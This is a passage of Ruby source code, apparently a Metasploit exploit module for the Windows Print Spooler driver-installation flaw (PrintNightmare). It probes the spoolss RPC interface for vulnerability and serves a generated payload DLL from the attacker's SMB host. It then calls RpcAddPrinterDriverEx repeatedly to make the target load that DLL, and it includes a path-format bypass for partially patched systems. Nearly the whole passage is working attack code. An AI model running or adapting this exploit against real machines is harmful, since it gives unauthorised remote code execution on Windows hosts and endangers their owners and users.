      connect(backend: :ruby_smb)
    rescue Rex::ConnectionError
      return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')
    end

    begin
      smb_login
    rescue Rex::Proto::SMB::Exceptions::LoginError
      return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')
    end

    begin
      dcerpc_bind_spoolss
    rescue RubySMB::Error::UnexpectedStatusCode => e
      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
      if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND
        print_error("The 'Print Spooler' service is disabled.")
      end
      return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")
    end

    @target_arch = dcerpc_getarch
    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43
    if @target_arch == ARCH_X64
      @environment = 'Windows x64'
    elsif @target_arch == ARCH_X86
      @environment = 'Windows NT x86'
    else
      return Exploit::CheckCode::Detected('Successfully bound to the remote service.')
    end

    print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})")

    print_status('Enumerating the installed printer drivers...')
    drivers = enum_printer_drivers(@environment)
    @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"
    vprint_status("Using driver path: #{@driver_path}")

    print_status('Retrieving the path of the printer driver directory...')
    @config_directory = get_printer_driver_directory(@environment)
    vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil?

    container = driver_container(
      p_config_file: 'C:\\Windows\\System32\\kernel32.dll',
      p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll"
    )

    case add_printer_driver_ex(container)
    when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code
      return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')
    when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND
      return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')
    when ::WindowsError::Win32::ERROR_BAD_NET_NAME
      return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')
    when ::WindowsError::Win32::ERROR_ACCESS_DENIED
      return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')
    end

    Exploit::CheckCode::Detected('Successfully bound to the remote service.')
  end

  def run
    fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64
    fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?
    fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?

    super
  end

  def setup
    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
    end

    super
  end

  def start_service
    file_name << '.dll'
    self.file_contents = generate_payload_dll

    super
  end

  def primer
    dll_path = unc
    if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/
      # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass
      # otherwise the operation will fail with ERROR_INVALID_PARAMETER
      dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}"
    end
    vprint_status("Using DLL path: #{dll_path}")

    filename = dll_path.rpartition('\\').last
    container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path)

    3.times do
      add_printer_driver_ex(container)
    end

    1.upto(3) do |directory|
      container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#{filename}")
      break if add_printer_driver_ex(container).nil?
    end

    cleanup_service
  end

  def driver_container(**kwargs)
    PrintSystem::DriverContainer.new(
      level: 2,
      tag: 2,
      driver_info: PrintSystem::DriverInfo2.new(
        c_version: 3,
        p_name_ref_id: 0x00020000,
        p_environment_ref_id: 0x00020004,
        p_driver_path_ref_id: 0x00020008,
        p_data_file_ref_id: 0x0002000c,
        p_config_file_ref_id: 0x00020010,
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",
        p_environment: @environment,
        p_driver_path: @driver_path,
        **kwargs
      )
    )
  end

  def dcerpc_bind_spoolss
    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])
    vprint_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    vprint_status("Bound to #{handle} ...")
  end

  def enum_printer_drivers(environment)
    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)
    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
    fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length
    DriverInfo2.read(response.p_drivers.map(&:chr).join)
  end

  def get_printer_driver_directory(environment)
    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)
    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
    fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length
    RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')
  end

  def add_printer_driver_ex(container)
    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES

    begin
      response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags)
    rescue RubySMB::Error::UnexpectedStatusCode => e
      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
      message = "Error #{nt_status.name} (#{nt_status.description})"
      if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN
        # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected
        print_status('The named pipe connection was broken, reconnecting...')
        reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do
          dcerpc_bind_spoolss
        rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e
          false
        else
          true
        end

        unless reconnected
          vprint_status('Failed to reconnect to the named pipe.')
          return nil
        end

        print_status('Successfully reconnected to the named pipe.')
        retry
      else
        print_error(message)
      end

      return nt_status
    end

    error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first
    message = "RpcAddPrinterDriverEx response #{response.error_status}"
    message << " #{error.name} (#{error.description})" unless error.nil?
    vprint_status(message)
    error
  end

  def rprn_call(name, **kwargs)
    request = PrintSystem.const_get("#{name}Request").new(**kwargs)

    begin
      raw_response = dcerpc.call(request.opnum, request.to_binary_s)
    rescue Rex::Proto::DCERPC::Exceptions::Fault => e
      fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).")
    end

    PrintSystem.const_get("#{name}Response").read(raw_response)
  end

  class DriverInfo2Header < BinData::Record
    endian :little

    uint32 :c_version
    uint32 :name_offset
    uint32 :environment_offset
    uint32 :driver_path_offset
    uint32 :data_file_offset
    uint32 :config_file_offset
  end

  # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2
  # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
  DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do
    def self.read(data)
      header = DriverInfo2Header.read(data)
      new(
        header,
        RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')
      )
    end
  end
end
</code></pre>